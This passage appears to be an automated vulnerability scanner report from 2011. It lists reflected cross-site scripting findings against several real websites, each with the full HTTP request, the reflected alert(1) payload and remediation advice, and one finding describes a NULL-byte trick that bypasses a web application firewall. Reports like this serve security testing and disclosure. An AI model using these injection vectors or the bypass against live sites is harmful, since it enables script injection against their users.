Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:17:10 GMT
Set-Cookie: OAM_REQ=VERSION_4~kFAC1XaMEpaJ8SJOUrf%2fWt2Eo7fTd6kx5GkSobJXbTa9ofaZvm8X1pAbDFt2MEuS3MePYuT%2fmFC6jCqPOKsg5EGn8%2f5siYPls53KS2IfE5cAKYqV2nwLNlXuhTnUYD7%2bqgU6DNG1zrFdSZwFZvxFyciZDIbbbnhH9oRg0ceM1muAJi1B5fV43af5UynsM4YyGgbbfAlBREllNguLNsO9pgPSAgLfyd4J8jO1mR8hmBly2Qe1K8Tieg3%2fXbAEmyHqq8mBg8gmx4%2f7JOAbCcxazh%2brWrBI91l82SUGo8jfrb6mv7Am3WPBKU1mn48kN%2bqo2VJzi7%2fsLFGYYAnXWBwN7TjAFSkQzufA1dxnEwxBoVrJBif6NqyI5sc73QqvYIVs5s2uSoVB7OG4vusTIrSC3M1J%2bXw34SlfE6bwoWG7hXLJu%2fxGFD7tU7q6cnoKfMLgmk3RVX0WkuFW3l%2bNIRESpgSboEw1l80kwLoK5SB9TZhJ9U9B1LLNAKsjfaXmnYo7qK%2f9ATN1N7IxQht%2fXXmrWmsgSPIJWSCwMMYOqQ2mKce34pt0uSUhsDaGJrlfznnWIuParzsU26PBHAKlJlGGCAFsC1XiJQ9pygZGlYY7vWScqX37bn%2b%2fhLbSwbUQQu0y5z98Ulo%2b5IFLEPHYoOYJaWY4IuX%2fO0vKkiR8QgbH4bg%2fM6onyO9R%2f%2fdVrHGJJrJ%2fKrj00c%2fla7ybboS2B2PSyDf2BWQfi9EP5CMv8xmSwUVWpEf8YztPrfG6JBJt6sFIFZXLYyL9c3Lgh0Js63KCgdgTX5zatHuB9iQ%2b9vr%2bSHXkhdlkcTjBT3rKbEsEpxSgv2lavD2cqY8YSS2jwLZEvEcR1er6uRFGqya1OarXmPCdtpVogeosgxLQ%2bUAptgSI2sbJyRV%2f8fFlCu3WRB0otUeqy4dOida3y5yQ9mxxFfQar9jsGGvnEeX%2bhhsHo2PXtKnmfuGfUwyR6C8THvE4579RVsK84IEbwdym4Y0jvuQSFW81brTJ2JzejPjySRJDjAtdxl%2faO6SSI1B4FGvXS9lvaTvmPKCntQ%2bjbtwuN1kY7tjw9qplEyyxRJcA3ssOLdIvA4zwuVU0HwhaV4geRx7Uf94lsiEExtzGV2WPn9Y%2bc3X37HfRS3VshKqfNvksWF%2bbnL9fJRo3Z6V9Ho8BR3NbO%2bw%2fb4SPOP1grldEk6sBfPdD9knTg%2fTP1uM2ut2wR7doZ9YcUJZZ16%2f9trfZqHMjEX%2fiaKguZr46uYqTab2AK6dpfBmLNhNogN%2fPjJDVvbSwgJVDCXWY%2fPHLL4myDtby3Eyw7NQPgCUCK9s4T3NIUumy4Cnja86gM49x2Qa98H5TvFvv%2bzTMtB5yKYmSJfnpGViX0DZbiyV1E%2fZDQMP4btXxU3PTgqGbXx8ZYi3s61ou3twd3XAy8ulz4Z4BfaU7A%2fL2aB%2fSJzq8R%2f%2bdvQoskKYNJ39BX8ZIGoecc3vJTrnbVRFebOhc5P93wpRnhOeMughVxlUGmxnSx7ZiuirRQudGH4E8O7spt2Aaf5abIr62aflBa7yvQT%2bph5eVgyNyrS4P1OF%2f9oiDfhf8bb647N0kyr3JPyNDScpyqObS9CMjaVJUkcWKS7uakG8Vwsc1ndOVxHQRr8H1rW3SC3g3EfEzukgorgSTEWVMVk1Jm%2fUa2XDd89JKZHQJ3GMb5oZeTSn%2fR%2fFnUJr8OjZcE6BpcWS73EZN3WPDKjFkm8NVwKJGRXNcAwTWsca3SJEOOA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXqFk6uHK6EVADUS1EHWFB01tasY
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:17:10 GMT; path=/
Content-Length: 2386

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
<input type="hidden" name="request_id" value="-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029">
...[SNIP]...

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c45'-alert(1)-'fbc41ead6d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?62c45'-alert(1)-'fbc41ead6d9=1 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:12 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 13408
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/?62c45'-alert(1)-'fbc41ead6d9=1&refresh=true\'',300000)</script>
...[SNIP]...

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e284c'-alert(1)-'58c7eb2456a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoe284c'-alert(1)-'58c7eb2456a HTTP/1.1
Host: m.cnbc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_cc=true; s_nr=1315339276909; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/memberCenter.do%2526ot%253DA; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2003|Q_2001|Q_1997|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_320|Q_316; __qca=P0-1990433296-1315339228713; SESS93eea98f293ea8fd633599e480cddfdc=7hpvssf67odmb1il9onl52ot53; s_vi=[CS]v1|27331BA1051D06AC-4000010700020B59[CE]; rnmd_test=x; rnmd_uuid=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:08:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=99
Content-Type: text/html; charset=utf-8
Via: 1.1 C aicache6
Content-Length: 4010
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 15:08:30 GMT

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/favicon.icoe284c'-alert(1)-'58c7eb2456a?refresh=true\'',300000)</script>
...[SNIP]...

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e92'-alert(1)-'f261e685920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytestc3e92'-alert(1)-'f261e685920/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4643
X-Aicache-OS: 64.210.193.251:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytestc3e92'-alert(1)-'f261e685920/ipecho.php?refresh=true\'',300000)</script>
...[SNIP]...

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59238'-alert(1)-'0408d9d8ef3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4642
X-Aicache-OS: 64.210.193.252:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3?refresh=true\'',300000)</script>
...[SNIP]...

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9ed34<script>alert(1)</script>42adcdc5dfa was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:33:19 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 214
Date: Tue, 06 Sep 2011 15:33:18 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d3c'%3balert(1)//7a40c4d48d9 was submitted in the sLinkJSData parameter. This input was echoed as f3d3c';alert(1)//7a40c4d48d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D047400098978f3d3c'%3balert(1)//7a40c4d48d9&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3563
Expires: Tue, 06 Sep 2011 17:45:22 GMT
Date: Tue, 06 Sep 2011 16:45:59 GMT
Connection: close


function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
610","middle","center",true,"",true,false,false,false,true);goWin.focus();}
function cii_VARInfo(rsCustomer,rsZip,rsSKU,rnRGID,nPGID,nVID,nRadius,nHeight,nWidth,sStatusBar){var sUrl='?upc=047400098978f3d3c';alert(1)//7a40c4d48d9&cii_nSCID=28&cii_nCTID=29&cii_sZip='+rsZip+'&cii_sSKU='+escape(rsSKU).replace('+','%2B')+'&cii_nVID='+nVID+'&cii_nRGID='+rnRGID+'&cii_nPGID='+nPGID+'&cii_nRadius='+nRadius;var oWin=ykb_PopUp('VARInfo'
...[SNIP]...

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94563"%3balert(1)//be0c49fb5ff was submitted in the sLinkJSData parameter. This input was echoed as 94563";alert(1)//be0c49fb5ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D04740009897894563"%3balert(1)//be0c49fb5ff&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3554
Expires: Tue, 06 Sep 2011 17:45:08 GMT
Date: Tue, 06 Sep 2011 16:45:54 GMT
Connection: close


function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
ocID="+rnLocID+"&cii_nRGID=1964&cii_nPGID=0&cii_nRadius=15";document.location = sUrl;}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVStoreID,rnColPos){var sUrl="?upc=04740009897894563";alert(1)//be0c49fb5ff&cii_nSCID="+rnSCID+"&cii_nCTID="+rnCTID+"&cii_sZip=&cii_nIID=163810295&cii_sSKU="+escape("047400098978").replace("+","%2B")+"&cii_nVID="+rnVID+"&cii_nLocID="+rnLocID+"&cii_nStoreID="+rnStoreID+"&cii_n
...[SNIP]...

3.59. http://ping.crowdscience.com/ping.js [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %006c87d'%3balert(1)//7d11b67251b was submitted in the m parameter. This input was echoed as 6c87d';alert(1)//7d11b67251b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0%006c87d'%3balert(1)//7d11b67251b&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=53404c51af1f5e49; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:33:02; Path=/
Content-Length: 8035
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...
f5524dcb2c411c47c&vguid=53404c51af1f5e49&sc=eNotjEEOwjAMBP/icxTZ3tiO8xtUhOBURIs4IP5OKnVPc5jZLz0/NKRyoff9sW80oECE1QyzFFZkoW25ndJledEw5oOv62R4heicNFEGZyu07CuNqTA3tc4yj6CR4q6Fjki9uvZEWkTL9I7fH93NH90=&m=0.6c87d';alert(1)//7d11b67251b&style=' + self.style;
return self;
})();


CrowdScience.imageUrls = [
'http://static.crowdscience.com/invlogo/dir02/logo_2_59cd36bf0aee
...[SNIP]...

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 510c5"-alert(1)-"dd817178b4e was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
